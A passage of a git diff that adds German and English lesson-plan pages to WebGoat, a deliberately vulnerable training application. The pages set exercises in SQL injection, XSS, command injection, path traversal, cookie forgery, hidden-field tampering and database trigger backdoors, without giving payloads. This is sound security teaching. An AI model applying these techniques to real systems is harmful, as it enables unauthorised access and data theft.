--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/HttpBasics.html
@@ -0,0 +1,29 @@
+
+
+Lehrinhalt:
+ Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
+
+So funktioniert HTTP:
+
+Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper.
+Der Client initiiert eine Transaktion wie folgt:
+
+ Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
+
GET /index.html?param=value HTTP/1.0
+ Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
+Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
+Grundsätzliche(s) Ziel(e):
+
+Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar!
+
+
Lehrplan: Client-seitige JavaScript Validierung umgehen
+
Konzept:
+
+Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden.
+Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in
+einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede
+Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter
+in der Applikation benutzt werden.
+
+Grundsätzliche(s) Ziel(e):
+
+Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig
+überprüft. Versuchen Sie diese
+Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln
+gleichzeitig brechen!
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/LogSpoofing.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/LogSpoofing.html
new file mode 100644
index 000000000..c5bbff3b0
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/LogSpoofing.html
@@ -0,0 +1,17 @@
+
+
Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)
+
Konzept:
+
+Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen
+bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen
+Handlungen verleiten bzw. ihn einfach nur verwirren.
+
+
+Grundsätzliche(s) Ziel(e):
+
+* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
+
Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas
+
Konzept:
+
+In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem
+er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen
+der Zugang bei direkter Anfrage ansonsten abgelehnt würde.
+
+Grundsätzliche(s) Ziel(e):
+Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/ReflectedXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/ReflectedXSS.html
new file mode 100644
index 000000000..60f5e0e80
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/ReflectedXSS.html
@@ -0,0 +1,19 @@
+
+
Lehrplan: Cross Site Scripting (XSS)
+
Konzept:
+
+Jegliche Eingabedaten sollten auf der Serverseite überprüft werden.
+XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden.
+Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese
+URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die
+URL zu besuchen.
+
+
+
+General Goal(s):
+
+Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können.
+Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren)
+so dass das Skript in Ihrem Browser ausgeführt wird.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
new file mode 100644
index 000000000..dbaaeb3c3
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
@@ -0,0 +1,16 @@
+
+
Lehrplan: Zugang zu Web-Resourcen erzwingen
+
Konzept::
+Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die
+für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle.
+
+Grundsätzliche(s) Ziel(e):
+
+Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle
+von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht
+für das Bestehen dieser Lektion.
+Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie
+die Lektion abgeschlossen haben.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/SqlNumericInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/SqlNumericInjection.html
new file mode 100644
index 000000000..ad9e7cc41
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/SqlNumericInjection.html
@@ -0,0 +1,18 @@
+
+
Lehrplan: Durchführung von Numeric SQL Injection
+
Konzept:
+SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
+Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
+Kompromittierung des kompletten Systems.
+Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
+Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
+leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
+besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
+Skripten und Datenbankabfragen eingebaut werden.
+Grundsätzliche(s) Ziel(e):
+
+Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der
+als Resultat alle Wetterdaten anzeigt.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/SqlStringInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/SqlStringInjection.html
new file mode 100644
index 000000000..0cd360db7
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/SqlStringInjection.html
@@ -0,0 +1,20 @@
+
+
Lehrplan: Durchführung von String SQL Injection
+
Konzept:
+
+SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
+Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
+Kompromittierung des kompletten Systems.
+Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
+Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
+leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
+besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
+Skripten und Datenbankabfragen eingebaut werden.
+Grundsätzliche(s) Ziel(e):
+
+Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie
+exemplarisch mit dem Benutzernamen "Smith" ausprobieren.
+Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/StoredXss.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/StoredXss.html
new file mode 100644
index 000000000..74463c949
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/StoredXss.html
@@ -0,0 +1,16 @@
+
+
Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)
+
Konzept:
+
+Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte
+und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert
+wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte
+Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird.
+
+
+Grundsätzliche(s) Ziel(e):
+
+Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte
+Seite bzw. Inhalt anzuzeigen.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..5475df32c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
@@ -0,0 +1,22 @@
+
+
Lehrplan: Einen Authentisierungs Cookie fa¨lschen
+
Lehrinhalt:
+
+Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt.
+Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist.
+Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden.
+Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden.
+Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen
+die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden.
+
+
+
+Grundsätzliche(s) Ziel(e):
+
+ Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an
+ und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen,
+ versuchen Sie Ihre Identität zu "alice" zu wechseln.
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/BasicAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/BasicAuthentication.html
new file mode 100644
index 000000000..65490ef0c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/BasicAuthentication.html
@@ -0,0 +1,15 @@
+
+
Lehrplan: Basic Authentication
+
Lehrinhalt:
+
+"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage.
+Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource.
+Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver.
+Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind.
+Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer
+sie ein weiteres Mal eingeben muss.Grundsätzliche(s) Ziel(e):
+Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/CommandInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/CommandInjection.html
new file mode 100644
index 000000000..a8de365cb
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/CommandInjection.html
@@ -0,0 +1,16 @@
+
+
Lehrplan: Einschleusen von Programmcode
+
Konzept:
+
+Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe
+sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems.
+Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
+Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
+leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
+besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
+Skripten und Datenbankabfragen eingebaut werden.
+Grundsätzliche(s) Ziel(e):
+
+Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
new file mode 100644
index 000000000..c4606ac75
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
@@ -0,0 +1,14 @@
+
+
Lehrplan: Versteckte Felder ausnutzen
+
Konzept:
+
+Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere
+Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte
+diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder
+zu seinem Vorteil manipulieren kann.
+
+ Grundsätzliche(s) Ziel(e):
+Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/HtmlClues.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/HtmlClues.html
new file mode 100644
index 000000000..70d63e5ee
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/HtmlClues.html
@@ -0,0 +1,13 @@
+
+
Lehrplan: Nützliche Hinweise in HTML entdecken.
+
Konzept:
+
+ Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode.
+ Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht.
+
+
+Grundsätzliche(s) Ziel(e):
+Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/HttpBasics.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/HttpBasics.html
new file mode 100644
index 000000000..995912eeb
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/HttpBasics.html
@@ -0,0 +1,29 @@
+
+
+Lehrinhalt:
+ Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
+
+So funktioniert HTTP:
+
+Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper.
+Der Client initiiert eine Transaktion wie folgt:
+
+ Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
+
GET /index.html?param=value HTTP/1.0
+ Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
+Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
+Grundsätzliche(s) Ziel(e):
+
+Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar!
+
+
Lehrplan: Client-seitige JavaScript Validierung umgehen
+
Konzept:
+
+Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden.
+Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in
+einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede
+Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter
+in der Applikation benutzt werden.
+
+Grundsätzliche(s) Ziel(e):
+
+Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig
+überprüft. Versuchen Sie diese
+Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln
+gleichzeitig brechen!
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/LogSpoofing.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/LogSpoofing.html
new file mode 100644
index 000000000..c5bbff3b0
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/LogSpoofing.html
@@ -0,0 +1,17 @@
+
+
Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)
+
Konzept:
+
+Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen
+bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen
+Handlungen verleiten bzw. ihn einfach nur verwirren.
+
+
+Grundsätzliche(s) Ziel(e):
+
+* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
+
Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas
+
Konzept:
+
+In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem
+er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen
+der Zugang bei direkter Anfrage ansonsten abgelehnt würde.
+
+Grundsätzliche(s) Ziel(e):
+Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/ReflectedXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/ReflectedXSS.html
new file mode 100644
index 000000000..60f5e0e80
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/ReflectedXSS.html
@@ -0,0 +1,19 @@
+
+
Lehrplan: Cross Site Scripting (XSS)
+
Konzept:
+
+Jegliche Eingabedaten sollten auf der Serverseite überprüft werden.
+XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden.
+Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese
+URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die
+URL zu besuchen.
+
+
+
+General Goal(s):
+
+Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können.
+Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren)
+so dass das Skript in Ihrem Browser ausgeführt wird.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
new file mode 100644
index 000000000..dbaaeb3c3
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
@@ -0,0 +1,16 @@
+
+
Lehrplan: Zugang zu Web-Resourcen erzwingen
+
Konzept::
+Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die
+für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle.
+
+Grundsätzliche(s) Ziel(e):
+
+Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle
+von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht
+für das Bestehen dieser Lektion.
+Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie
+die Lektion abgeschlossen haben.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/SqlNumericInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/SqlNumericInjection.html
new file mode 100644
index 000000000..ad9e7cc41
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/SqlNumericInjection.html
@@ -0,0 +1,18 @@
+
+
Lehrplan: Durchführung von Numeric SQL Injection
+
Konzept:
+SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
+Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
+Kompromittierung des kompletten Systems.
+Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
+Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
+leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
+besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
+Skripten und Datenbankabfragen eingebaut werden.
+Grundsätzliche(s) Ziel(e):
+
+Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der
+als Resultat alle Wetterdaten anzeigt.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/SqlStringInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/SqlStringInjection.html
new file mode 100644
index 000000000..0cd360db7
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/SqlStringInjection.html
@@ -0,0 +1,20 @@
+
+
Lehrplan: Durchführung von String SQL Injection
+
Konzept:
+
+SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
+Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
+Kompromittierung des kompletten Systems.
+Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
+Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
+leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
+besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
+Skripten und Datenbankabfragen eingebaut werden.
+Grundsätzliche(s) Ziel(e):
+
+Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie
+exemplarisch mit dem Benutzernamen "Smith" ausprobieren.
+Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/StoredXss.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/StoredXss.html
new file mode 100644
index 000000000..74463c949
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/StoredXss.html
@@ -0,0 +1,16 @@
+
+
Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)
+
Konzept:
+
+Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte
+und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert
+wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte
+Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird.
+
+
+Grundsätzliche(s) Ziel(e):
+
+Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte
+Seite bzw. Inhalt anzuzeigen.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html b/webgoat-5.4/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..5475df32c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
@@ -0,0 +1,22 @@
+
+
Lehrplan: Einen Authentisierungs Cookie fa¨lschen
+
Lehrinhalt:
+
+Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt.
+Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist.
+Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden.
+Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden.
+Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen
+die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden.
+
+
+
+Grundsätzliche(s) Ziel(e):
+
+ Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an
+ und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen,
+ versuchen Sie Ihre Identität zu "alice" zu wechseln.
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/AccessControlMatrix.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
new file mode 100644
index 000000000..576bf3b72
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/AccessControlMatrix.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: Using an Access Control Matrix
+
Concept / Topic To Teach:
+
+In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.
+General Goal(s):
+Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/BackDoors.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/BackDoors.html
new file mode 100644
index 000000000..c4ac8a08a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/BackDoors.html
@@ -0,0 +1,23 @@
+
+
Lesson Plan Title: How to Create Database Back Door Attacks.
+
Concept / Topic To Teach:
+How to Create Database Back Door Attacks.
+
+
+How the attacks works:
+
+Databases are used usually as a backend for web applications. Also it is used as a media of storage. It can also
+be used as a place to store a malicious activity such as a trigger. A trigger is called by the database management
+system upon the execution of another database operation like insert, select, update or delete. An attacker for example
+can create a trigger that would set his email address instead of every new user's email address.
+
General Goal(s):
+
+* Your goal should be to learn how you can exploit a vulnerable query to create a trigger.
+
Lesson Plan Title: Basic Authentication
+
Concept / Topic To Teach:
+
+Basic Authentication is used to protect server side resources. The web server will send a 401 authentication request with the response for the requested resource. The client side browser will then prompt the user for a user name and password using a browser supplied dialog box. The browser will base64 encode the user name and password and send those credentials back to the web server. The web server will then validate the credentials and return the requested resource if the credentials are correct. These credentials are automatically resent for each page protected with this mechanism without requiring the user to enter their credentials again.General Goal(s):
+For this lesson, your goal is to understand Basic Authentication and answer the questions below.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/BlindSqlInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
new file mode 100644
index 000000000..0ff76e32e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/BlindSqlInjection.html
@@ -0,0 +1,15 @@
+
+
Lesson Plan Title: How to Perform Blind SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
+
Lesson Plan Title: How to Exploit Buffer Overflows
+
Concept / Topic To Teach:
+How to Exploit Buffer Overflows.
+General Goal(s):
+This lesson needs a creator!
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/CSRF.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/CSRF.html
new file mode 100644
index 000000000..dc17ddef9
--- /dev/null
